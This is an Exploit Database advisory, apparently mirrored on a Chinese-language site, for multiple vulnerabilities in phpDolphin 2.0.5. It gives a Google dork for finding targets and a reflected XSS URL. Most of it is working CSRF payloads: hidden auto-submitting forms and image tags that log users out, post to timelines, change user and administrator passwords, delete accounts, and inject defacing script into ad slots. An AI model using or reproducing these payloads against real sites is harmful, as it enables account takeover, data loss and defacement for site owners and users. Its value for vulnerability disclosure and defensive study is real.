phpDolphin 2.0.5 – Multiple Vulnerabilities

• Exploit Database
• 300 阅读

• 作者： WhiteCollarGroup
  日期： 2016-01-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39243/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98

  # Exploit Title: phpDolphin <= 2.0.5 CSRF # Google Dork: intext:"Powered by phpDolphin" # Date: January, 15th 2016 # Exploit Author: WhiteCollarGroup # Vendor Homepage: http://phpdolphin.com # Version: 2.0.5   XSS (Reflected) ===============   > http://target.com/index.php?a=search&q=teste&filter=m"><h1>XSS</h1><noscript> CSRF ====   We&apos;ve found no protection against CSRF (Cross-site Request Forgery), which made possible to do any kind of act on a user (or admin) account.   NO FORMS are secured at all. But we&apos;ve included some interesting examples. These examples execute actions on the user account while he&apos;s visiting a special page prepared by us in any other server. He won&apos;t know anything while visiting, as nothing is shown. Let&apos;s start from the basic:   Logging an user off ------------------ </code><code> <img src="http://localhost/dolphin/Script/index.php?a=feed&logout=1" width="1" height="1" /> </code><code> It&apos;s good to remember that if the user kept the "remember me" on, there are cookies called "username" and (MD5-encoded) "password".   Posting on user&apos;s timeline --------------------------   By changing the "group" input, it&apos;s also possible to post on groups. </code><code> Lorem ipsum dolor sit amet :)<br/> Take a look on your profile ;) <form method="post" action="http://localhost/dolphin/Script/requests/post_message.php" target="hiddenframe" id="hackfrm"> <input type="hidden" name="message" value="HAXORED" /> <input type="hidden" name="privacy" value="1" /> <input type="hidden" name="group" value="" /> <input type="hidden" name="value" value="" /> </form> <iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe> <script> document.getElementById(&apos;hackfrm&apos;).submit(); </script> </code><code> Things can get a bit funnier.   Changing user password ----------------------   It&apos;s interesting that the change password form does NOT require the actual password. Just make sure "password" and "repeat_password" inputs have EXACTLY the same value. </code><code> <form method="post" action="http://localhost/dolphin/Script/index.php?a=settings&b=security" target="hiddenframe" id="hackfrm"> <input type="hidden" name="password" value="hacked1" /> <input type="hidden" name="repeat_password" value="hacked1" /> </form> <iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe> <script> document.getElementById(&apos;hackfrm&apos;).submit(); </script> </code><code> Funny enough? Not?   So let&apos;s change the administration password too. Of course this page must be accessed by the administrator. </code><code> <form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=security" target="hiddenframe" id="hackfrm"> <input type="hidden" name="password" value="hacked1" /> <input type="hidden" name="repeat_password" value="hacked1" /> </form> <iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe> <script> document.getElementById(&apos;hackfrm&apos;).submit(); </script> </code><code> In order to open the admin panel, just visit <code>/index.php?a=admin</code>.   Want to delete some user? Just find out the user ID (numeric). For that, just open the user profile, view source (Ctrl + U), find (Ctrl + F) "userid". You will find two attributes "data-userid". That&apos;s the numeric user ID. </code><code> <img src="http://localhost/dolphin/Script/index.php?a=admin&b=users&delete=USER_ID_HERE" width="0" height="0" /> </code><code> Just want to mess everything up?   Hacking site index ==================   By adding Javascript code to one or more of the advertising units, we can block anyone&apos;s access to the site. This is our payload: </code><code> <script> document.body.innerHTML = &apos;<h1>HACKED</h1>&apos;; </script><noscript> </code><code> And this is our code: </code><code> <form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=manage_ads&m=i" target="hiddenframe" id="hackfrm"> <input type="hidden" name="ad1" value="<script> document.body.innerHTML = &apos;<h1>HACKED</h1>&apos;; </script><noscript>" /> <input type="hidden" name="ad2" value="<script> document.body.innerHTML = &apos;<h1>HACKED</h1>&apos;; </script><noscript>" /> <input type="hidden" name="ad3" value="<script> document.body.innerHTML = &apos;<h1>HACKED</h1>&apos;; </script><noscript>" /> <input type="hidden" name="ad4" value="<script> document.body.innerHTML = &apos;<h1>HACKED</h1>&apos;; </script><noscript>" /> <input type="hidden" name="ad5" value="<script> document.body.innerHTML = &apos;<h1>HACKED</h1>&apos;; </script><noscript>" /> <input type="hidden" name="ad6" value="<script> document.body.innerHTML = &apos;<h1>HACKED</h1>&apos;; </script><noscript>" /> </form> <iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe> <script> document.getElementById(&apos;hackfrm&apos;).submit(); </script> </code><code> Enough?   Simply all forms are vulnerable to CSRF. These were just some.